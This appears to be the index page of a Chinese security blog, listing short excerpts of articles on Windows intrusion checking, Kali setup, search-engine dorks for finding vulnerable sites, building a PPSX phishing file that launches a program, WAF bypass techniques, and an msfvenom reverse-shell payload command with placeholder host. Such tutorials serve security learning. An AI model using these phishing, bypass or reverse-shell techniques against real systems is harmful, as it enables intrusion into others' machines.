技术文章

这家伙很懒,还没填写该栏目的介绍呢~

技术文章

浅谈Windows入侵检查

阅读(249)评论(0)

1 准备工作 检查人员应该可以物理接触可疑的系统。因为黑客可能侦测到你可以在检查系统,例如网络监听,所以物理接触会比远程控制更好。 为了当做法庭证据可能需要将硬盘做实体备份。如果需要,断开所有与可疑机器的网络连接。 做入侵检查时,检查人员需要一台PC对检查的过程进行检查项目的结果记录。 请维...

技术文章

Kali vmtools+更新源配置

阅读(230)评论(0)

添加更新源 编辑sources.list,将kali更新源加入其中 sudo vim /etc/apt/sources.list Kali 2018国内更新源 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib&nb...

技术文章

挖洞技巧之关键词

阅读(355)评论(0)

话不多说,已写到下面,怎么用看你自己,祝各位大佬挖洞多又多。 site:xx.com Version  查看子域名cms site:xx.com inurl:php|jsp|asp|aspx  查看子域名动态脚本 site:xx.com admin|logi...

技术文章

构造PPSX钓鱼文件

阅读(281)评论(0)

首先,创建一个普通的PPTX文件,随便填入一些内容,如下图: 之后插入一个动作按钮,具体位置如下图: 这里要选择空白的那个,选择以后,在页面中拉出一个触发位置,之后会弹出动作设置的界面: 选择要运行的程序可在后面直接加参数,如计算器,之后点击确定。 现在显...

技术文章

我的WafBypass之道(Misc篇)

阅读(380)评论(0)

0x00 前言 I am back ... 再不出这篇就要被笑然老板吊打了 ... 本来这一篇打算写免杀的。考虑了下既然是预期最后一篇那就写个汇总和一些偏门的吧。并且在辍写本文时将前两篇进行了增改。本文主要讲以下几点,也是讲的并不全,但是实用。对其进行简单的阐述下: Bypass 菜刀连接拦截 ...

技术文章

我的WafBypass之道(Upload篇)

阅读(287)评论(0)

0x00 前言 玩waf当然也要讲究循序渐进,姊妹篇就写文件上传好了,感觉也就SQLi和Xss的WafBypass最体现发散性思维的,而文件上传、免杀、权限提升这几点的Bypass更需要的是实战的经验。本文内容为沉淀下来的总结以及一些经典案例。想到哪写到哪,所以可能不是很全。创造姿势不易,且行且珍惜。(案例图不好上,毕竟是upload的By...

技术文章

我的WafBypass之道(SQL注入篇)

阅读(530)评论(0)

0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So......

技术文章

跟心仪的妹子玩游戏误入博彩APP,顺手破了个案

阅读(617)评论(0)

一、前言 过年回家饭局上碰到一个原来心仪的妹子,虽然已经4、5年没见面了,妹子见到我还是分外亲热,不仅主动挨着我坐着,居然还邀请我一起玩游戏,心中窃喜不已,哥们王者刚上了王者星耀,先好好炫一下技术,然后…… 妹子就给我发来了这个: 下载一看,尼玛什么鬼,妹子居然也玩网络棋牌了,这种小游戏一般都很弱啊,要...

技术文章

msfvenom生成各种Payload命令

阅读(280)评论(0)

msfvenom -l        列出所有模块,攻击载荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to C...



Powered by 小陈 © Boon theme By 小陈